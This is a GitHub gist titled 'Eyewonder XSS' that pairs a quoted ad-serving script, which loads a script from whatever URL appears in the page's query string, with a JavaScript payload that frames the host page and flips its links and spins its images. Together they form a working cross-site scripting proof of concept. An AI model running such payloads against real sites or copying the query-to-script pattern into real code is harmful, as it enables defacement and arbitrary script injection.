Skip to content
Create a gist now

Instantly share code, notes, and snippets.

Eyewonder XSS
document.write('<style type="text/css">body{padding); margin:0}</style>');
document.write('<iframe id="iwonder_hack" src="http://' + location.host + '/" width="100%" height="100%" style="border:0;padding:0;margin:0"></iframe>');
setTimeout(function(){
var frmdoc = document.getElementsByTagName('iframe')[0].contentWindow.document
,rotation = 0
,links = frmdoc.getElementsByTagName('a')
,images = frmdoc.getElementsByTagName('img')
,props = ['transform', 'WebkitTransform', 'msTransform', 'MozTransform', 'OTransform']
,transform = function(elem, trans) {
for (var i = 0; i < props.length; i++) {
if (typeof elem.style[props[i]] != "undefined") {
elem.style[props[i]] = trans;
return;
}
}
};
for (var i = links.length - 1; i >= 0; i--) {
links[i].style.display = 'inline-block';
transform(links[i], 'scaleX(-1)');
}
setInterval(function() {
rotation++;
for (var i = images.length - 1; i >= 0; i--) {
transform(images[i], 'rotate(-' + (rotation) +'deg)');
}
}, 50);
}, 1000);
<script language="JavaScript">
var cnnDocDomain = '';
if(location.hostname.indexOf('cnn.com')>0) {cnnDocDomain='cnn.com';}
if(location.hostname.indexOf('turner.com')>0) {if(document.layers){cnnDocDomain='turner.com:'+location.port;}else{cnnDocDomain='turner.com';}}
if(cnnDocDomain) {document.domain = cnnDocDomain;}
var query = window.location.search;
var adUrl = query.substring(5, query.length);
var clickthru;
var failclickthru;
document.write('<s'+'cript language="JavaScript" src="');
document.write(adUrl+'"></s'+'cript>');
</script>
@JoshuaVSherman

Thanks for helping me out with this week's homework assignment

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Something went wrong with that request. Please try again.